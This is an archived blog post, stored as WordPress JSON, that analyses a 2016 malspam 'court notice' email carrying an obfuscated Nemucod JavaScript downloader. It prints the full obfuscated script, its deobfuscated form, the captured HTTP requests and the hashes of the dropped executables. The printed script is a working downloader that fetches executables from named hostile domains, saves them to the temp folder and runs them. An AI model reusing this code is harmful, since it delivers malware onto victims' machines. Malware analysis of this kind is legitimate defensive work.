{"id":405,"date":"2016-03-02T22:29:06","date_gmt":"2016-03-02T22:29:06","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=405"},"modified":"2016-03-02T22:30:28","modified_gmt":"2016-03-02T22:30:28","slug":"2016-03-01-malicious-javascript-attachment-nemucodkovter","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=405","title":{"rendered":"2016-03-01 Malicious Javascript attachment – Nemucod\/Kovter"},"content":{"rendered":"

So it is another day at the office and I was looking at some of the malspam that we had received. So I decided to open one up and have a play. Let’s see what this one email is all about:<\/p>\n

\"Original<\/a><\/p>\n

As you can see, this is one of the “Notice to appear in Court” emails that has been going around for some time now. Let’s see what is in the zip file:<\/p>\n

var o25='042"+',t86='ge.ni',r61='at',a49='.Exp',e63='rings',j19='type ',n50='o.o',h38='pt',k10=' i&lt;b',k40='.Cre',o75='(f',i87='ttp:',a54=' { ',o71=' = 0',j45=' x',v99='cript',z74='258',i51='ject(',p25='1,',n60='087"',u58='om.',z64='andE',o18='; var',f9='xa.',f97=' l',k31='fo',w76='r xa ',z29='ozuz',k19='posit',t28='ion =',r93='if (',e66=') {',i75='tus ',o82='Scrip',i46='a.',k60='); ',q47='.s',b68='am");',b93='r) { ',q98='++)',n30='t.Cre',g47='n=1; ',w18='; b',l67='va',u87='dn =',s49='(var ',q46='"WS',n8='xo',l57='.C',m36='TP"',c20='20',u57='" ");',b40='un(fn',m55='cou',a76='e",2)',k84='00',v45=this,y64=' 1',l47='; ',w57='"GET',y18='xe",',a69='} c',d43='.ex',b77='a.clo',n97='WScr',q18='o = W',v85='eval',x86='for ',j87=' }; x',x53='a.',m32='.leng',w39='eObj',r57='tri',c87='d = i',q58='pons',i31='l"',a4='n, f',k9='r dn',r30='MP',z85=') { ',w3='ysci',p58='xo.s',x42='.si',c9='; };',i59='hu ',q66='2.XML',w26='eB',m48='pen(',j81=' var ',u11='reate',d23='ect("',u65='} cat',p1='id=',q64='at',f95='atc',j79='n+n+"',h12='; try',n84='HT',m40='+n',a20='cz',y83='.res',k49='= ',m76=' 0; ',b83=' va',w92='romCh',w70='"ADOD',s71=' }; ',b3='ze ',g53='if (',x44=v45[v85],h98='va'+'r b ='+' "vi'+'tra'+t86+'ch'+'ost.'+'ru '+'dob'+z29+'let.'+i59+a20+w3+'och.c'+u58+'pl".s'+'plit('+u57+b83+'r w'+'s ='+' WS'+v99+l57+u11+'Obje'+'ct('+q46+'cri'+h38+'.Shel'+i31+'); v'+'ar f'+'n ='+' ws'+a49+z64+'nvi'+'ronme'+'ntSt'+e63+'("%TE'+r30+'%"'+')+S'+r57+'ng.f'+w92+'arC'+'od'+'e(9'+'2)+'+'"931'+n60+o18+' x'+q18+o82+n30+q64+w39+d23+'MSXML'+q66+n84+m36+'); va'+w76+'= '+n97+'ipt'+k40+r61+'eOb'+i51+w70+'B.St'+'re'+b68+j81+'ld ='+m76+x86+'(var '+g47+'n&lt;'+'=3; n'+q98+' { '+k31+'r '+s49+'i=ld;'+k10+m32+'th;'+' i++)'+a54+l67+k9+o71+'; '+'try {'+j45+n50+m48+w57+'","h'+i87+'\/\/"+'+'b['+'i]+'+'"\/'+m55+'nter'+'\/?'+p1+'555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&amp;rn'+'d='+z74+o25+a4+'alse'+'); xo'+q47+'end('+k60+g53+p58+'ta'+i75+'== '+c20+'0)'+' { x'+x53+'open'+'(); '+'xa.'+j19+k49+'1; x'+i46+'writ'+'e('+n8+y83+q58+w26+'ody)'+l47+r93+'xa'+x42+b3+'&gt; '+'10'+k84+z85+u87+y64+'; '+'xa.'+k19+t28+' 0; '+f9+'saveT'+'oFi'+'le'+o75+j79+d43+a76+h12+' { '+'ws.R'+b40+m40+'+".e'+y18+p25+'0)'+'; '+u65+'ch'+' (er)'+' { };'+j87+b77+'se('+'); }'+'; if'+' (dn '+'== 1'+e66+f97+c87+w18+'rea'+'k;'+s71+a69+f95+'h (e'+b93+'}; }'+c9;x44(h98);<\/pre>\n
Yay, it is another script file. Looking at it you can see some of the domains it tries to use and some other bits of information. I looked up the MD5 (572bc8fe45582af271e1302c3d9d7a72) for this file on VirusTotal\/Malwr\/Hybrid Analysis and it came back with nothing. When I ran this through JSDetox with one of my co-workers we got the following back:<\/p>\n
\r\n\tvar b = "vitrage.nichost.ru dobozuzlet.hu czyscioch.com.pl".split(" "); \r\n\tvar ws = WScript.CreateObject("WScript.Shell");\r\n\tvar fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"931087";\r\n\tvar xo = WScript.CreateObject("MSXML2.XMLHTTP");\r\n\tvar xa = WScript.CreateObject("ADODB.Stream");\r\n\tvar ld = 0; for (var n=1; n<=3; n++) \r\n\t{for (var i=ld; i<b.length; i++) { var dn = 0; try { xo.open("GET","http:\/\/"+b[i]+"\/counter\/?id=555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&rnd=258042"+n, false); xo.send(); if (xo.status == 200){ xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 1000) {\r\n\tdn = 1;\r\n\txa.position = 0;\r\n\t xa.saveToFile(fn+n+".exe",2); \r\n\ttry { ws.Run(fn+n+".exe",1,0); \r\n\t} \r\n\tcatch (er) { };\r\n\t};\r\n\txa.close(); \r\n\t};\r\n\tif (dn == 1) \r\n\t{ld = i; \r\n\tbreak; \r\n\t};\r\n\t} \r\n\tcatch (er) { };\r\n\t};\r\n\t};<\/pre>\n
When I ran this file on my test VM, the javascript immediately called out to the ‘vitrage.nichost.ru’ domain (which you can see in the above script as well) only. Once again, there were three GET requests for what were labeled as ‘GIF’ files, but clearly were not as you can see below:<\/p>\n
\r\n\tGET \/counter\/?id=555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&rnd=2580421 HTTP\/1.1\r\n\tAccept: *\/*\r\n\tUA-CPU: AMD64\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\n\tHost: vitrage.nichost.ru\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.6.2\r\n\tDate: Tue, 01 Mar 2016 19:56:06 GMT\r\n\tContent-Type: image\/gif\r\n\tContent-Length: 283165\r\n\tConnection: keep-alive\r\n\tX-Powered-By: PHP\/5.2.10\r\n\tContent-Disposition: attachment; filename=bb14.gif\r\n\r\n\tMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.<\/pre>\n
The GET request being made were:<\/p>\n
195.208.0.121 80 vitrage.nichost.ru  0 GET \/counter\/?id=555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&rnd=2580421\r\n195.208.0.121 80 vitrage.nichost.ru  0 GET \/counter\/?id=555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&rnd=2580422\r\n195.208.0.121 80 vitrage.nichost.ru  0 GET \/counter\/?id=555D565E05160D4A080D06011609050A241605070F17140507014A070B095E275E0301101709094A16115E17525E5550515252545D505C575E55&rnd=2580423<\/pre>\n
The three files that get dropped onto the system from the GET requests are as follows:<\/p>\n
\"Properties<\/a>
Properties of the three malicious binaries<\/p><\/div>\n
which have the following MD5 hashes:<\/p>\n
File Name: 9310871.exe
\nMD5: 84876532c2757fce8bf680f8b8a17438
\nSHA256: 333861969d8e01a844308c5d8c6c1b8957a12abf4c8ef6d830cbb4b1570a83dd
\nDetection Ratio: 5 \/ 56
\nFirst Submission: 2016-03-01 21:57:52 UTC
\nVirusTotal Link<\/a><\/p>\n
File Name: 9310872.exe
\nMD5: 926c1259473d665a293548ddec02280d
\nSHA256: 9332d77c0010d7b9452c967e2fc88c4e666fd505841f3a906297e00e8332f19e
\nDetection Ratio: 28 \/ 56
\nFirst Submission: 2016-02-28 22:56:19 UTC
\nVirusTotal Link<\/a><\/p>\n
File Name: 9310873.exe
\nMD5: d48ef4bb0549a67083017169169ef3ee
\nSHA256: daf4d96a121c9e4935082d4e0264088ff352f14d868f8720d8fa7e4f99c82f05
\nDetection Ratio: 10 \/ 55
\nFirst Submission: 2012-06-03 11:08:19 UTC
\nVirusTotal Link<\/a><\/p>\n
As you can see from the YouTube video of me running the malicious javascript file on my VM, once I execute the file, the first binary that gets run is the ‘9310871.exe’ followed by ‘9310872.exe.’ Shortly after that it looks like Powershell executes and is most likely when the rest of the malicious files get downloaded onto the system, and persistence for this piece of malware gets setup as well. Odd the 9310873.exe never runs though.<\/p>\n